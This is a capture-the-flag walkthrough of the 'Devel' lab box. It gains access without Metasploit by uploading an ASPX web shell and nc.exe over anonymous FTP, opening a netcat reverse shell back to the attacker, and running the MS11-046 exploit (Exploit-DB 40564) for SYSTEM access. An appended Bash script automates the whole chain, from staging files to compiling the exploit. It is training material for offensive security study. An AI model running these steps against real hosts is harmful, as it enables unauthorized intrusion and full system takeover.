Metasploitless Devel

PDF with images: https://jdwhitaker.github.io/static/devel.pdf

The Devel box is a great beginner-level challenge. The official walkthrough uses Metasploit; this one does not. The box hinges on an unrealistic configuration issue: the FTP root is the same as the web root, and anonymous users may upload to the server. We upload an ASPX web shell and use it to launch a full reverse shell. Identifying the OS version (and architecture) reveals that the machine may be vulnerable to the privilege escalation described in MS11-046. This proves to be true: executing the compiled exploit yields SYSTEM access on the machine.

Methods

Initial Reconnaissance: Port Scanning

We nmap the target IP address with the default top ports, performing version detection (-sV) and default script scanning (-sC).

We find that anonymous FTP login is allowed and that the server is a Windows machine running IIS 7.5. The FTP root also appears to be the same as the web root; the quick way to confirm this is to upload a small file over FTP and request it over HTTP. After searching "IIS 7.5 asp" on the web, we find that classic ASP is not installed by default on IIS 7.0 and above, so an ASP.NET (ASPX) web shell is the better bet.

Web Shell

We upload the ASPX web shell and the Windows netcat binary included with Kali over anonymous FTP.
We will use netcat to connect back to our machine for a standard reverse shell.

Upgrading to a Reverse Shell

We use our web shell to identify the location of the netcat binary we uploaded through FTP; since the FTP root is the web root, it sits in the IIS web root (C:\inetpub\wwwroot by default).
We start a listener on our local machine and run a netcat reverse shell back to it from the web shell, giving the full path to nc.exe, -e cmd.exe, and our listener's address and port.

Additional Reconnaissance: System Information

The OS version reported by systeminfo is 6.1.7600 N/A Build 7600, i.e. a build 7600 (RTM, pre-SP1) Windows 7 kernel.

Privilege Escalation

Searching "6.1.7600 N/A Build 7600 privilege escalation" online turns up an exploit at https://www.exploit-db.com/exploits/40564. This exploits the vulnerability described in MS11-046.
We search for MS11-046 with searchsploit, compile the exploit we find [1] [2] (a C source that cross-compiles from Kali with mingw-w64), and upload it to the remote target over FTP.
We execute the binary from the reverse shell and gain SYSTEM access.
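As an added example (not code from the original post), the steps above as one Bash script run from Kali. TARGET, LHOST and LPORT are assumed values, as are the Kali paths for cmdasp.aspx and nc.exe and the IIS default web root C:\inetpub\wwwroot; the systeminfo sample at the bottom is constructed, not a capture from the box. The script checks the FTP-root-equals-web-root claim with a canary file before anything else is staged, and decides from systeminfo output whether MS11-046 is worth trying (Windows 6.1, 32-bit, and the KB2503665 fix absent) rather than from the build number alone.

```shell
#!/usr/bin/env bash
# Added example, not the original post's code: the Devel chain as shell functions.
# Usage: ./devel.sh recon | verify-webroot | stage | nc-command | listen | check-sample | build-exploit
set -eu

TARGET="${TARGET:-10.10.10.5}"    # assumption: the box's address on the lab VPN
LHOST="${LHOST:-10.10.14.2}"      # assumption: our VPN address (the reverse shell calls back here)
LPORT="${LPORT:-4444}"            # assumption: listener port

# 1. Initial reconnaissance: default top ports, version detection and default scripts.
recon() {
  nmap -sV -sC -oN "devel_${TARGET}.nmap" "$TARGET"
}

# Anonymous FTP upload with curl; the trailing slash keeps the local file name.
ftp_put() {
  curl -sS -T "$1" --user anonymous:anonymous "ftp://${TARGET}/"
}

# 2. Check, rather than assume, that the FTP root is the web root: upload a canary
#    and fetch it back over HTTP. Returns non-zero if the roots differ.
verify_webroot() {
  local canary="canary-$$.txt"
  printf 'devel-canary\n' > "$canary"
  ftp_put "$canary"
  curl -sS "http://${TARGET}/${canary}" | grep -q 'devel-canary'
}

# 3. Stage Kali's ASPX web shell and Windows netcat in the web root.
stage() {
  ftp_put /usr/share/webshells/aspx/cmdasp.aspx
  # Older Kali releases keep nc.exe under /usr/share/windows-binaries/ instead.
  ftp_put /usr/share/windows-resources/binaries/nc.exe
}

# 4. The line to paste into the web shell's Execute box: full path to the uploaded
#    binary (the web shell's working directory is not the web root), -e cmd.exe,
#    and our listener's address and port. Args: attacker host, attacker port.
nc_command() {
  printf 'C:\\inetpub\\wwwroot\\nc.exe -e cmd.exe %s %s' "$1" "$2"
}

# Listener for the reverse shell; start this before pressing Execute.
listen() {
  nc -lvnp "$LPORT"
}

# 5. Decide from `systeminfo` output whether MS11-046 is worth trying. Prints "yes"
#    when the host is Windows 6.1 (7 / Server 2008 R2), 32-bit (EDB 40564 is the
#    x86 build), and KB2503665, the MS11-046 fix, is not in the hotfix list.
ms11_046_candidate() {
  local info ver arch
  info=$(printf '%s\n' "$1" | tr -d '\r')
  ver=$(printf '%s\n' "$info" | sed -n 's/^OS Version:[[:space:]]*\([0-9.]*\).*/\1/p')
  arch=$(printf '%s\n' "$info" | sed -n 's/^System Type:[[:space:]]*\(.*\)$/\1/p')
  case "$ver" in 6.1.*) ;; *) echo no; return 0 ;; esac
  case "$arch" in [Xx]86*) ;; *) echo no; return 0 ;; esac
  if printf '%s\n' "$info" | grep -q 'KB2503665'; then echo no; return 0; fi
  echo yes
}

# 6. Fetch the public exploit, cross-compile it with mingw-w64, stage it; run it from
#    the reverse shell (C:\inetpub\wwwroot\ms11-046.exe) to get a SYSTEM shell.
build_exploit() {
  searchsploit -m 40564                      # copies 40564.c into the current directory
  i686-w64-mingw32-gcc 40564.c -o ms11-046.exe -lws2_32
  ftp_put ms11-046.exe
}

# Constructed sample of `systeminfo` output, trimmed to the fields we parse (not a
# capture from the box); the version string is the one the walkthrough reports.
SAMPLE_SYSTEMINFO=$(cat <<'EOF'
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
EOF
)

case "${1:-}" in
  recon)          recon ;;
  verify-webroot) verify_webroot && echo "FTP root == web root" ;;
  stage)          stage ;;
  nc-command)     nc_command "$LHOST" "$LPORT"; echo ;;
  listen)         listen ;;
  check-sample)   ms11_046_candidate "$SAMPLE_SYSTEMINFO" ;;
  build-exploit)  build_exploit ;;
esac
```

Run `./devel.sh listen` in one terminal, then paste the output of `./devel.sh nc-command` into the web shell's Execute box; the most common reason the listener "doesn't catch anything" is a missing host or port on that line. The systeminfo check is deliberately conservative: a 6.1 build with KB2503665 installed, or a 64-bit system type, gets "no", since the 40564 build of the exploit targets unpatched 32-bit hosts.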

Loot

We search for the flag files and print them.

Comments

  • Nice, thanks.

  • Question: when using the "Execute" command in the web browser...

    Is it typed as entire directory of the uploaded nc.exe? Below example:

    C:\inetpub\wwwroot\nc.exe -e cmd

    Because when I did this, it didn't work... the shell back to the machine didn't catch anything.
